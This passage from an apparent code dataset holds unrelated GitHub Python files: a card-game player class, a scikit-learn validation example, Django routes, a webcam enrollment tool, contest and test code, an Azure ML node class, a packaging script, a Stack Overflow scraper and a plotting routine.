self.save()\n","repo_name":"LEE-JAE-HYUN179/AI_assignment-cs188-","sub_path":"finalproject/AI_final/qlearningAgents.py","file_name":"qlearningAgents.py","file_ext":"py","file_size_in_byte":9303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2999114672","text":"from collections import deque\nfrom functools import reduce\nfrom random import choice, randint\n\nfrom character_utils import character_by_name\nfrom discards import Discards\nfrom dummy import DummyAgent, Dummy\nfrom selection import Pair\ntry:\n from user import UserAgentCLI\nexcept:\n print('skipping UserAgentCLI import')\nfrom utils import (choose_random_valid_behavior, get_possible)\n\n\nclass Player:\n def __init__(self, name, is_ai):\n self.name = name\n self.is_ai = is_ai\n self.life = 20\n self.position = None\n self.finisher = None\n self.ante_finisher = False\n self.discards = Discards(2)\n self.played_styles = []\n self.played_bases = []\n self.selection = None\n self.active = False\n self.modifiers = []\n self.refresh()\n\n if name == 'Training Dummy':\n self.character = Dummy()\n self.agent = DummyAgent()\n self.life = float('inf')\n else:\n self.character = character_by_name(name)\n if self.character is None:\n self.character = character_by_name('Simple Bob')\n\n if self.is_ai:\n self.agent = DummyAgent()\n else:\n self.agent = UserAgentCLI()\n\n def __str__(self):\n return self.name + '(' + str(self.life) + ')'\n\n @property\n def status(self):\n return {\n 'life': self.life,\n 'position': self.position\n }\n\n @property\n def soak(self):\n return self.get_mod_val('soak')\n\n @property\n def stun_guard(self):\n return self.get_mod_val('stun_guard')\n\n @property\n def stun_immune(self):\n return self.get_mod_val('stun_immune', False)\n\n @property\n def can_hit(self):\n return self.get_mod_val('can_hit', True)\n\n @property\n def dodge(self):\n return self.get_mod_val('dodge', False)\n\n @property\n def power(self):\n return self.get_mod_val('power')\n\n @property\n def priority(self):\n return self.get_mod_val('priority')\n\n @property\n def atk_range(self):\n if self.selection.atk_range is not None:\n def range_val(range_mod): return range_mod.val\n range_mods = self.get_relevant_mods('range')\n range_mods = list(map(range_val, range_mods))\n range_mods.append(self.selection.atk_range)\n combos = [[]]\n for m in range_mods:\n t = []\n for y in m:\n for i in combos:\n t.append(i+[y])\n combos = t\n return sorted(set([sum(c) for c in combos]))\n else:\n return None\n\n def get_mod_val(self, mtype, default=0):\n relevant = self.get_relevant_mods(mtype)\n if len(relevant) == 0:\n return default\n\n if isinstance(default, bool):\n for m in relevant:\n if m.val != default:\n return m.val\n return default\n elif isinstance(default, (int, float)):\n return reduce((lambda acc, m: acc+m.val), relevant, default)\n else:\n print('Unexpected Mod mtype/def: {} {}'.format(mtype, default))\n return None\n\n def get_relevant_mods(self, mtype):\n def f(m): return m.mtype == mtype\n return list(filter(f, self.modifiers))\n\n def refresh(self):\n self.stunned = False\n self.actions = []\n self.update_modifiers()\n\n def update_modifiers(self):\n for i in range(len(self.modifiers)):\n if self.modifiers[i].onset == 0:\n self.modifiers[i].duration -= 1\n else:\n self.modifiers[i].onset -= 1\n\n def f(m): return m.duration > 0\n self.modifiers = list(filter(f, self.modifiers))\n\n def get_ante(self, state):\n if self.finisher is not None and self.life <= 7:\n if hasattr(self.agent, 'get_ante'):\n if self.agent.get_ante(state) == 'Finisher':\n self.ante_finisher = True\n return self.finisher\n else:\n if randint(0, 2) == 2:\n self.ante_finisher = True\n return self.finisher\n return None\n\n def get_ante_effects(self):\n if hasattr(self.character, 'get_ante_effects'):\n return self.character.get_ante_effects()\n else:\n return None\n\n def discard(self, to_discard):\n self.discard_inner(to_discard)\n\n def discard_inner(self, to_discard):\n self.discards.discard_inner(to_discard)\n\n def discard_outer(self, to_discard):\n self.discards.discard_outer(to_discard)\n\n def select_finisher(self, state):\n if hasattr(self.character, 'finishers'):\n options = self.character.finishers\n if hasattr(self.agent, 'select_finisher'):\n self.finisher = self.agent.select_finisher(options, state)\n else:\n self.finisher = choice(options)\n\n def init_discards(self, state):\n styles = self.character.styles\n bases = self.character.bases\n if hasattr(self.agent, 'init_discards'):\n to_discard = self.agent.init_discards(styles, bases, state)\n self.discard_outer([\n styles[to_discard[0]],\n bases[to_discard[2]]\n ])\n self.discard([\n styles[to_discard[1]],\n bases[to_discard[3]]\n ])\n else:\n self.discard_outer([\n styles[0],\n bases[0]\n ])\n self.discard([\n styles[1],\n bases[1]\n ])\n\n def recover_discards(self):\n self.discards.cycle_out()\n\n def recycle(self):\n if self.ante_finisher:\n self.ante_finisher = False\n self.finisher = None\n else:\n self.recover_discards()\n self.discard(self.played_styles.pop())\n self.discard(self.played_bases.pop())\n self.played_styles = []\n self.played_bases = []\n self.selection = None\n\n def get_selection(self, state):\n av_s = self.available_styles\n av_b = self.available_bases\n if hasattr(self.agent, 'get_selection'):\n style, base = self.agent.get_selection(av_s, av_b, state)\n else:\n style = choice(av_s)\n base = choice(av_b)\n self.played_styles.append(style)\n self.played_bases.append(base)\n return Pair(style, base)\n\n def get_new_base(self, state):\n av_b = self.available_bases\n if hasattr(self.agent, 'get_new_base'):\n base = self.agent.get_new_base(av_b, state)\n else:\n base = choice(self.available_bases)\n self.played_bases.append(base)\n return base\n\n @property\n def available_styles(self):\n opts = self.character.styles\n discarded = self.discards.styles\n played = self.played_styles\n return [s for s in opts if s not in discarded and s not in played]\n\n @property\n def available_bases(self):\n opts = self.character.bases\n discarded = self.discards.bases\n played = self.played_bases\n return [b for b in opts if b not in discarded and b not in played]\n\n def has_playable_styles(self):\n return len(self.available_styles) > 0\n\n def has_playable_bases(self):\n return len(self.available_bases) > 0\n\n def handle_modifier(self, mod):\n if mod.mtype == 'stun' and not self.stun_immune:\n self.stunned = True\n elif callable(mod.mtype):\n mod.mtype(mod.val)\n elif mod.mtype == 'lose_life':\n if self.life - mod.val > 0:\n self.life -= mod.val\n else:\n self.life = 1\n else:\n self.modifiers.append(mod)\n\n def get_selection_effects(self):\n return self.selection.get_effects()\n\n def grant_action(self, action):\n self.actions.append(action)\n\n def remove_action(self, action):\n self.actions.remove(action)\n\n def get_effects(self, trigger, passed_selection=None):\n if self.selection is not None:\n return self.selection.get_effects(trigger)\n else:\n return passed_selection.get_effects(trigger)\n\n def get_actions(self, trigger):\n return get_possible(self.selection, trigger)\n\n def get_behavior(self, actions, state, trigger):\n if hasattr(self.agent, 'get_behavior'):\n chosen, b = self.agent.get_behavior(actions, state, trigger)\n else:\n chosen, b = choose_random_valid_behavior(actions, state)\n return chosen, b\n\n def handle_damage(self, damage, attacker):\n if damage > 0:\n damage = self.soak_damage(damage)\n if damage > self.stun_guard and not self.stun_immune:\n self.stunned = True\n self.life -= damage\n return damage\n\n # Returns leftover un-soaked damage\n def soak_damage(self, damage):\n damage = damage - self.soak\n if damage > 0:\n return damage\n else:\n return 0\n","repo_name":"reedling/ai-bc","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":9213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4067189933","text":"import pandas as pd\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import train_test_split\n\ndef modelValidation():\n file_path = \"/Users/timmanas/ProgrammingProjects/ProgrammingRecipesPython/res/melb_data.csv\"\n home_data = pd.read_csv(file_path)\n\n y = home_data.Price\n\n features = ['Rooms', 'Bathroom', 'Landsize', 'Lattitude', 'Longtitude']\n X = home_data[features]\n\n # Sets data to be randomly set to be trained or analyzed\n train_X, val_X, train_y, val_y = train_test_split(X, y, random_state=0)\n\n model = DecisionTreeRegressor()\n model.fit(train_X, train_y)\n\n\n predicted_home_prices = model.predict(val_X)\n\n # This is where you calculate the Error\n mae = mean_absolute_error(val_y, predicted_home_prices)\n print(\"Mean Absolute Error: \", mae)\n\n\n\n\n\n\nif __name__ == '__main__':\n modelValidation()\n\n\n\n'''\nWhat is model validation ?\n- Evaluate the predictive accuracy of the model\n\n\nExample of Model Validation: Mean Absolute Error (MAE)\nformula:\nerror = actual - predicted\nIf House cost is $150,000 and predicted price is $100,000. Then error is $50,000\n\nNote: To calculate MAE, a model is required\n\n'''","repo_name":"timManas/PythonProgrammingRecipes","sub_path":"project/src/MachineLearning/ModelValidation.py","file_name":"ModelValidation.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43555607144","text":"from django.conf.urls import url\nfrom django.urls import path, re_path\n\nfrom . import views\n\nurlpatterns = [\n path('login/', views.login_user),\n path('register/', views.register_user),\n path('logout/', views.logout_user),\n path('getInfo/', views.user_info),\n path('media/<str:year>/<str:month>/<str:filename>', views.my_image),\n path('get_my_class/', views.my_class),\n path('add_sign/', views.add_sign),\n path('send_group_msg/', views.send_group_msg),\n path('my_question/', views.my_question),\n path('my_white_app/', views.my_white_app),\n path('is_correct/', views.VerificationAnswer),\n]","repo_name":"xdtcssdi/sc_p","sub_path":"KEKEAPI/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19070783358","text":"import cv2\r\nimport shutil,os\r\nimport tkinter as tk\r\nfrom tkinter import *\r\nglobal check\r\ndef take_photo():\r\n cam = cv2.VideoCapture(0)\r\n\r\n cv2.namedWindow(\"test\")\r\n\r\n img_counter = 0\r\n\r\n while True:\r\n ret, frame = cam.read()\r\n if not ret:\r\n print(\"failed to grab frame\")\r\n break\r\n cv2.imshow(\"test\", frame)\r\n\r\n k = cv2.waitKey(1)\r\n if k%256 == 27:\r\n # ESC pressed\r\n print(\"Escape hit, closing...\")\r\n break\r\n elif k%256 == 32:\r\n # SPACE pressed\r\n global name1\r\n name1=str(name.get())\r\n img_name = name1+\".jpg\"\r\n cv2.imwrite(img_name, frame)\r\n label()\r\n break\r\n #print(\"{} written!\".format(img_name))\r\n\r\n cam.release()\r\n\r\n cv2.destroyAllWindows()\r\n\r\n\r\ndef take_path():\r\n shutil.copy(\"source\", \"destination\")\r\n\r\ncheck=0\r\nen=tk.Tk()\r\nen.title(\"ENROLMENT\")\r\nen.geometry(\"500x500\")\r\nl2 = tk.Label(text='ENTER NAME', font='calibre 13 bold', fg='red')\r\nl2.place(x=127, y=105, anchor=CENTER)\r\nname= tk.Entry(bg='white', fg='red', font='calibre 13 bold')\r\nname.place(x=350, y=105, anchor=CENTER, width=300)\r\nb1 = tk.Button(text='Take Photo', font='bold', command=lambda: take_photo(), fg='red')\r\nb1.place(x=150, y=140)\r\n\r\nl3 = tk.Label(text='PRESS SPACE BAR TO CAPTURE PHOTO', font='calibre 13 bold', fg='red')\r\nl3.place(x=200, y=200, anchor=CENTER)\r\ndef label():\r\n l3 = tk.Label(text=name1+\".jeg sucessfully saved !!\", font='calibre 13 bold', fg='red')\r\n l3.place(x=200, y=200, anchor=CENTER,width=350)\r\nen.mainloop()\r\n\r\n","repo_name":"manojtummala/Face-Recognition-Attendence-System","sub_path":"enrollment.py","file_name":"enrollment.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71503961121","text":"#!/usr/bin/env python3\n\nfrom pprint import pprint\nfrom collections import deque, defaultdict\nimport sys\n\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.buffer.readline\ninf = float(\"inf\")\n\nQ = int(input())\nqueries = []\n\nfor _ in range(Q):\n l, r = map(int, input().split())\n queries.append([l, r])\n# print(queries)\n\nMAX = 10 ** 5 + 1\n\n# Sieve of Eratosthenes\nis_prime = [1 for _ in range(MAX)]\nis_prime[0] = 0\nis_prime[1] = 0\n\nfor i in range(2, MAX):\n if not is_prime[i]:\n continue\n j = i + i\n while j < MAX:\n is_prime[j] = 0\n j += i\n\na = [0 for _ in range(MAX)]\nfor i in range(MAX):\n if i % 2 == 0:\n continue\n if is_prime[i] and is_prime[(i + 1) // 2]:\n a[i] = 1\n\ncum_sum = [0 for _ in range(MAX + 1)]\nfor i in range(MAX):\n cum_sum[i + 1] = cum_sum[i] + a[i]\n\nfor left, right in queries:\n # print(f\"s[left] = {cum_sum[left]}\")\n # print(f\"s[right] = {cum_sum[right]}\")\n x = cum_sum[right + 1] - cum_sum[left]\n print(x)\n","repo_name":"d-matsui/atcorder","sub_path":"100-problems/d-2017-like-number.py","file_name":"d-2017-like-number.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70450979361","text":"import numpy as np\n\nfrom data_sequences import utils\n\n\ndef test_downloader_makedirs(tmpdir):\n root_path = tmpdir.mkdir(\"root_dir\")\n new_path = root_path.join(\"new_folder\")\n # check that root dir now empty\n assert len(root_path.listdir()) == 0\n # check that new folder was created\n utils.makedirs(str(new_path))\n assert len(root_path.listdir()) == 1\n # check that no any new folders were created and no any exceptions\n utils.makedirs(str(new_path))\n assert len(root_path.listdir()) == 1\n\n\ndef test_nd_array_to_from_one_hot():\n n_classes = 10\n arr = np.tile(np.arange(n_classes), (5, 2))\n # convert to one hot\n converted = utils.nd_array_to_one_hot(arr, n_classes)\n assert converted.shape[-1] == n_classes\n assert len(converted.shape) == len(arr.shape) + 1\n for i in range(n_classes):\n assert sum(converted[0][i]) == 1\n # convert back from one hot\n converted_back = utils.nd_array_from_one_hot(converted)\n assert converted_back.shape == arr.shape\n assert np.all(arr == converted_back)\n","repo_name":"ikhlestov/data_sequences","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3573101432","text":"from typing import Dict, List, Union\n\nfrom marshmallow import INCLUDE, Schema\n\nfrom ... import MpiDistribution, PyTorchDistribution, TensorFlowDistribution, RayDistribution\nfrom ..._schema import PathAwareSchema\nfrom ..._schema.core.fields import DistributionField\nfrom ...entities import CommandJobLimits, JobResourceConfiguration\nfrom ...entities._util import get_rest_dict_for_node_attrs\nfrom .._schema.component import NodeType\nfrom ..entities.component import InternalComponent\nfrom ..entities.node import InternalBaseNode\n\n\nclass Command(InternalBaseNode):\n \"\"\"Node of internal command components in pipeline with specific run settings.\n\n Different from azure.ai.ml.entities.Command, type of this class is CommandComponent.\n \"\"\"\n\n def __init__(self, **kwargs):\n node_type = kwargs.pop(\"type\", None) or NodeType.COMMAND\n super(Command, self).__init__(type=node_type, **kwargs)\n self._init = True\n self._resources = kwargs.pop(\"resources\", JobResourceConfiguration())\n self._compute = kwargs.pop(\"compute\", None)\n self._environment = kwargs.pop(\"environment\", None)\n self._environment_variables = kwargs.pop(\"environment_variables\", None)\n self._limits = kwargs.pop(\"limits\", CommandJobLimits())\n self._init = False\n\n @property\n def compute(self) -> str:\n \"\"\"Get the compute definition for the command.\n\n :return: The compute definition\n :rtype: str\n \"\"\"\n return self._compute\n\n @compute.setter\n def compute(self, value: str):\n \"\"\"Set the compute definition for the command.\n\n :param value: The new compute definition\n :type value: str\n \"\"\"\n self._compute = value\n\n @property\n def environment(self) -> str:\n \"\"\"Get the environment definition for the command.\n\n :return: The environment definition\n :rtype: str\n \"\"\"\n return self._environment\n\n @environment.setter\n def environment(self, value: str):\n \"\"\"Set the environment definition for the command.\n\n :param value: The new environment definition\n :type value: str\n \"\"\"\n self._environment = value\n\n @property\n def environment_variables(self) -> Dict[str, str]:\n \"\"\"Get the environment variables for the command.\n\n :return: The environment variables\n :rtype: Dict[str, str]\n \"\"\"\n return self._environment_variables\n\n @environment_variables.setter\n def environment_variables(self, value: Dict[str, str]):\n \"\"\"Set the environment variables for the command.\n\n :param value: The new environment variables\n :type value: Dict[str, str]\n \"\"\"\n self._environment_variables = value\n\n @property\n def limits(self) -> CommandJobLimits:\n return self._limits\n\n @limits.setter\n def limits(self, value: CommandJobLimits):\n self._limits = value\n\n @property\n def resources(self) -> JobResourceConfiguration:\n \"\"\"Compute Resource configuration for the component.\n\n :return: The resource configuration\n :rtype: JobResourceConfiguration\n \"\"\"\n return self._resources\n\n @resources.setter\n def resources(self, value: JobResourceConfiguration):\n self._resources = value\n\n @classmethod\n def _picked_fields_from_dict_to_rest_object(cls) -> List[str]:\n return [\"environment\", \"limits\", \"resources\", \"environment_variables\"]\n\n @classmethod\n def _create_schema_for_validation(cls, context) -> Union[PathAwareSchema, Schema]:\n from .._schema.command import CommandSchema\n\n return CommandSchema(context=context)\n\n def _to_rest_object(self, **kwargs) -> dict:\n rest_obj = super()._to_rest_object(**kwargs)\n rest_obj.update(\n {\n \"limits\": get_rest_dict_for_node_attrs(self.limits, clear_empty_value=True),\n \"resources\": get_rest_dict_for_node_attrs(self.resources, clear_empty_value=True),\n }\n )\n return rest_obj\n\n @classmethod\n def _from_rest_object_to_init_params(cls, obj):\n obj = InternalBaseNode._from_rest_object_to_init_params(obj)\n\n if \"resources\" in obj and obj[\"resources\"]:\n obj[\"resources\"] = JobResourceConfiguration._from_rest_object(obj[\"resources\"])\n\n # handle limits\n if \"limits\" in obj and obj[\"limits\"]:\n obj[\"limits\"] = CommandJobLimits._from_rest_object(obj[\"limits\"])\n return obj\n\n\nclass Distributed(Command):\n def __init__(self, **kwargs):\n super(Distributed, self).__init__(**kwargs)\n self._distribution = kwargs.pop(\"distribution\", None)\n self._type = NodeType.DISTRIBUTED\n if self._distribution is None:\n # hack: distribution.type is required to set distribution, which is defined in launcher.type\n if (\n isinstance(self.component, InternalComponent)\n and self.component.launcher\n and \"type\" in self.component.launcher\n ):\n self.distribution = {\"type\": self.component.launcher[\"type\"]}\n else:\n raise ValueError(\n \"launcher.type must be specified in definition of DistributedComponent but got {}\".format(\n self.component\n )\n )\n\n @property\n def distribution(\n self,\n ) -> Union[PyTorchDistribution, MpiDistribution, TensorFlowDistribution, RayDistribution]:\n \"\"\"The distribution config of component, e.g. distribution={'type': 'mpi'}.\n\n :return: The distribution config\n :rtype: Union[PyTorchDistribution, MpiDistribution, TensorFlowDistribution, RayDistribution]\n \"\"\"\n return self._distribution\n\n @distribution.setter\n def distribution(\n self,\n value: Union[Dict, PyTorchDistribution, TensorFlowDistribution, MpiDistribution, RayDistribution],\n ):\n if isinstance(value, dict):\n dist_schema = DistributionField(unknown=INCLUDE)\n value = dist_schema._deserialize(value=value, attr=None, data=None)\n self._distribution = value\n\n @classmethod\n def _create_schema_for_validation(cls, context) -> Union[PathAwareSchema, Schema]:\n from .._schema.command import DistributedSchema\n\n return DistributedSchema(context=context)\n\n @classmethod\n def _picked_fields_from_dict_to_rest_object(cls) -> List[str]:\n return Command._picked_fields_from_dict_to_rest_object() + [\"distribution\"]\n\n def _to_rest_object(self, **kwargs) -> dict:\n rest_obj = super()._to_rest_object(**kwargs)\n distribution = self.distribution._to_rest_object() if self.distribution else None # pylint: disable=no-member\n rest_obj.update(\n {\n \"distribution\": get_rest_dict_for_node_attrs(distribution),\n }\n )\n return rest_obj\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/ml/azure-ai-ml/azure/ai/ml/_internal/entities/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"74086978721","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\nimport py3dtiles_merger\n\nwith open('requirements.txt') as f:\n requirements = f.read().splitlines()\n\nwith open('README.rst') as f:\n long_description = f.read()\n\nsetup(\n name='py3dtiles_merger',\n version=py3dtiles_merger.__version__,\n description=\"Merge independant 3dtiles tileset.json generated with py3dtiles into one.\",\n long_description=long_description,\n author=\"Loïc Messal\",\n author_email='Tofull@users.noreply.github.com',\n url='https://github.com/tofull/py3dtiles_merger',\n packages=find_packages(include=['py3dtiles_merger']),\n include_package_data=True,\n install_requires=requirements,\n license=\"MIT\",\n zip_safe=False,\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Natural Language :: French',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n ],\n test_suite='tests',\n entry_points={\n 'console_scripts': ['py3dtiles_merger=py3dtiles_merger.command_line:command_line'],\n }\n)\n","repo_name":"Tofull/py3dtiles_merger","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"54"} +{"seq_id":"33679603079","text":"import csv\nimport requests\nimport io\nfrom bs4 import BeautifulSoup\nfrom typing import List\nfrom datetime import datetime\nfrom dateutil.parser import parse\nfrom random import randint\nfrom time import sleep\n\n\nclass StackOverFlow:\n def __init__(self, *,urls: List = [], max_answers: int = 3, max_divisions: int = 3) -> None:\n '''Initialize variables used for scraping.'''\n self.urls: List = urls\n self.url: str = \"\"\n self.max_answers = max_answers\n self.max_divisions = max_divisions\n\n self.base_url: str = 'https://www.google.com/search'\n self.result: List = []\n\n self.headers = {\n 'User-Agent': 'Mozilla/5.0',\n }\n\n self.csv_headers = [None]\n\n def fetch(self):\n '''Fetch the url and returns bs4 object.'''\n response = requests.get(self.url, headers = self.headers)\n\n return response\n\n def parse(self, *, html) -> str:\n '''Parse the urls contained in the page and append to results.'''\n content = BeautifulSoup(html, 'lxml')\n\n features: dict = {}\n title = content.title.text.strip().replace(' - Stack Overflow', \" \").strip()\n title = title.replace(\"\\\"\", \"\")\n title = title.replace(\"'\", \"\")\n all_answers = content.select('div[class*=\"answer js-answer\"]')\n\n if all_answers:\n features['url'] = self.url\n features['title'] = title\n\n count = 1\n for ans in all_answers:\n answer = ans.find(\"div\", {\"class\": \"answercell post-layout--right\"})\n post_body = answer.find(\"div\", {\"class\": \"s-prose js-post-body\"})\n post_body = str(post_body)\n post_body = post_body.replace(\"<div class=\\\"s-prose js-post-body\\\" itemprop=\\\"text\\\">\", \" \")\n post_body = post_body[:-6]\n post_body = post_body.strip()\n post_body = post_body.replace(\"\\\"\", \"\")\n post_body = post_body.replace(\"'\", \"\")\n post_body = post_body.strip().encode('utf-8')\n \n features[f'best_answer_{count}'] = post_body.decode('utf-8')\n\n if count == self.max_answers:\n break\n else:\n count+=1\n \n if len(features.keys()) > len(self.csv_headers):\n self.csv_headers = features.keys()\n\n self.result.append(features)\n return True\n\n def write_csv(self, file_name: str = ''):\n '''Save results to csv.'''\n print('Saving to csv....')\n\n if self.result: \n with open(f'{file_name}', 'w', newline = '', encoding = 'utf-8') as csv_file:\n writer_object = csv.DictWriter(csv_file, fieldnames = self.csv_headers)\n writer_object.writeheader()\n\n for row in self.result:\n writer_object.writerow(row)\n\n print(f\"Saved to {file_name}\")\n\n def open_csv(self):\n '''Opens a csv.'''\n print(\"opening csv\")\n \n with open('results.csv', 'r', newline = '', encoding= 'utf-8') as csv_file:\n _dict_reader = csv.DictReader(csv_file)\n self._taken = list(_dict_reader)\n \n self._done = [_val['valid_urls'] for _val in self._taken]\n self.result = self._taken\n\n def store_response(self, *,response, page):\n '''Saved response as html.'''\n if response.status_code == 200:\n print('Saving response as html')\n filename = 'res' + str(page) + '.html'\n with io.open(filename, 'w', encoding = 'utf-8') as html_file:\n html_file.write(response.text)\n print('Done')\n else:\n print('Bad response!')\n \n def load_response(self): \n '''Load an html file.'''\n html = ''\n with open('res.html', 'r') as html_file:\n for line in html_file.read():\n html += line\n return html\n \n def run(self):\n '''Run all cases using the urls'''\n self.now = str(datetime.today()).replace(':','-')\n print(\"Scraping is running please don't exit...\")\n counter = 0\n part = 0\n actual_counter = 0\n\n for url in self.urls:\n\n sleep(randint(2,3))\n \n self.url = url\n resp = self.fetch()\n _boolean = self.parse(html = resp.content)\n actual_counter += 1\n\n if _boolean: \n counter+=1\n print(url)\n if counter % self.max_divisions == 0:\n part+=1 \n print(len(self.csv_headers))\n # print(self.result)\n self.write_csv(file_name = f\"{self.now}_part{part}.csv\")\n self.csv_headers = [None]\n self.result = []\n continue\n else:\n if (len(self.urls) - counter) > self.max_divisions:\n continue\n else:\n if actual_counter == len(self.urls):\n part += 1 \n self.write_csv(file_name = f\"{self.now}_part{part}.csv\")\n else:\n continue\n\n if actual_counter == len(self.urls):\n part += 1\n self.write_csv(file_name = f\"{self.now}_part{part}.csv\")\n\n\nif __name__ == '__main__':\n '''Run main file.'''\n file = open('stack_urls.txt', 'r', encoding='utf-8')\n urls: List = [acc.strip() for acc in file.readlines()]\n max_answers: int = 3\n max_divisions: int = 3\n \n #Run scraper\n scraper = StackOverFlow(urls= urls, max_answers = max_answers, max_divisions = max_divisions)\n scraper.run()\n","repo_name":"markokow/upwork_scrapers","sub_path":"Upwork/sastry/stackoveflow_modified/stackoverflow_modified.py","file_name":"stackoverflow_modified.py","file_ext":"py","file_size_in_byte":5799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29924037526","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\n# from matplotlib.colors import BoundaryNorm\n\n\ndef plot(aryVslSpc, strTtl, strXlabel, strYlabel, strPathOut, tpleLimX=None,\n tpleLimY=None, varMin=None, varMax=None):\n \"\"\"Plot visual space projection of parameter estimates.\"\"\"\n # Font type:\n strFont = 'Liberation Sans'\n\n # Font colour:\n vecFontClr = np.array([17.0/255.0, 85.0/255.0, 124.0/255.0])\n\n # Colour scale minimum:\n if varMin is None:\n varMin = np.percentile(aryVslSpc, 1.0)\n varMin = (np.floor(varMin * 10.0) / 10.0)\n # varMin = (np.floor(varMin * 0.1) / 0.1)\n # varMin = np.floor(varMin)\n\n # Colour scale maximum:\n if varMax is None:\n varMax = np.percentile(aryVslSpc, 99.0)\n varMax = (np.ceil(varMax * 10.0) / 10.0)\n # varMax = (np.ceil(varMax * 0.1) / 0.1)\n # varMax = np.ceil(varMax)\n\n # Saveguard to avoid division by zero in case of no negative values:\n # if np.less_equal(0.0, varMin):\n # varMin = -1.0\n\n # Same scale for negative and positive colour bar:\n if np.greater(np.absolute(varMin), varMax):\n varMax = np.absolute(varMin)\n else:\n varMin = np.multiply(-1.0, np.absolute(varMax))\n\n # Create main figure:\n fig01 = plt.figure(figsize=(5.0, 3.0),\n dpi=200.0,\n facecolor=([1.0, 1.0, 1.0]),\n edgecolor=([1.0, 1.0, 1.0]))\n\n # Big subplot in the background for common axes labels:\n axsCmn = fig01.add_subplot(111)\n\n # Turn off axis lines and ticks of the big subplot:\n axsCmn.spines['top'].set_color('none')\n axsCmn.spines['bottom'].set_color('none')\n axsCmn.spines['left'].set_color('none')\n axsCmn.spines['right'].set_color('none')\n axsCmn.tick_params(labelcolor='w',\n top=False,\n bottom=False,\n left=False,\n right=False)\n\n # Set and adjust common axes labels:\n axsCmn.set_xlabel(strXlabel,\n alpha=1.0,\n fontname=strFont,\n fontweight='normal',\n fontsize=7.0,\n color=vecFontClr,\n position=(0.5, 0.0))\n axsCmn.set_ylabel(strYlabel,\n alpha=1.0,\n fontname=strFont,\n fontweight='normal',\n fontsize=7.0,\n color=vecFontClr,\n position=(0.0, 0.5))\n axsCmn.set_title(strTtl,\n alpha=1.0,\n fontname=strFont,\n fontweight='bold',\n fontsize=10.0,\n color=vecFontClr,\n position=(0.5, 1.1))\n\n # Create colour-bar axis:\n axsTmp = fig01.add_subplot(111)\n\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n # Number of colour increments:\n varNumClr = 20\n\n # Colour values for the first colormap (used for negative values):\n aryClr01 = plt.cm.PuBu(np.linspace(0.1, 1.0, varNumClr))\n\n # Invert the first colour map:\n aryClr01 = np.flipud(np.array(aryClr01, ndmin=2))\n\n # Colour values for the second colormap (used for positive values):\n aryClr02 = plt.cm.OrRd(np.linspace(0.1, 1.0, varNumClr))\n\n # Combine negative and positive colour arrays:\n aryClr03 = np.vstack((aryClr01, aryClr02))\n\n # Create new custom colormap, combining two default colormaps:\n objCustClrMp = colors.LinearSegmentedColormap.from_list('custClrMp',\n aryClr03)\n\n # Lookup vector for negative colour range:\n vecClrRngNeg = np.linspace(varMin, 0.0, num=varNumClr)\n\n # Lookup vector for positive colour range:\n vecClrRngPos = np.linspace(0.0, varMax, num=varNumClr)\n\n # Stack lookup vectors:\n vecClrRng = np.hstack((vecClrRngNeg, vecClrRngPos))\n\n # 'Normalize' object, needed to use custom colour maps and lookup table\n # with matplotlib:\n objClrNorm = colors.BoundaryNorm(vecClrRng, objCustClrMp.N)\n\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n # Array needs to be transposed for image coordinate conventions.\n aryVslSpc = aryVslSpc.T\n\n # Create plot:\n pltTmpCorr = plt.imshow(aryVslSpc,\n interpolation='none', # 'bicubic',\n origin='lower',\n norm=objClrNorm,\n cmap=objCustClrMp,\n aspect='equal')\n\n if not (tpleLimX is None):\n\n # Position of x labels:\n vecPosLblX = np.linspace(0.0,\n (aryVslSpc.shape[1] - 1),\n num=int(tpleLimX[2]),\n endpoint=True)\n vecPosLblX = np.around(vecPosLblX, decimals=2)\n lstPosLblX = vecPosLblX.tolist()\n\n # Set position of x labels:\n axsTmp.set_xticks(lstPosLblX)\n\n # Labels for x axis:\n vecLblX = np.linspace(tpleLimX[0],\n tpleLimX[1],\n num=int(tpleLimX[2]),\n endpoint=True).tolist()\n vecLblX = np.around(vecLblX, decimals=2)\n lstLblX = vecLblX.tolist()\n\n # Set axis labels:\n axsTmp.set_xticklabels(lstLblX)\n\n if not (tpleLimY is None):\n\n # Position of y labels:\n vecPosLblY = np.linspace(0.0,\n (aryVslSpc.shape[0] - 1),\n num=int(tpleLimY[2]),\n endpoint=True)\n vecPosLblY = np.around(vecPosLblY, 